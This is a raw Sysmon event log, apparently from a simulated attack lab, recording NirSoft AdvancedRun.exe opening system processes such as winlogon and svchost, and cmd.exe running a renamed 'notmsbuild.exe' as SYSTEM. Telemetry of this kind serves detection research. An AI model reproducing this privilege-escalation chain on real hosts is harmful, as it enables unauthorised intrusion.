19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.229{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004057070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004057014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.180{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004016263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.192{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004016256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.191{834264DD-0044-61EB-FE05-000000002702}508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg 
C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004016255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0044-61EB-FC05-000000002702}2148C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 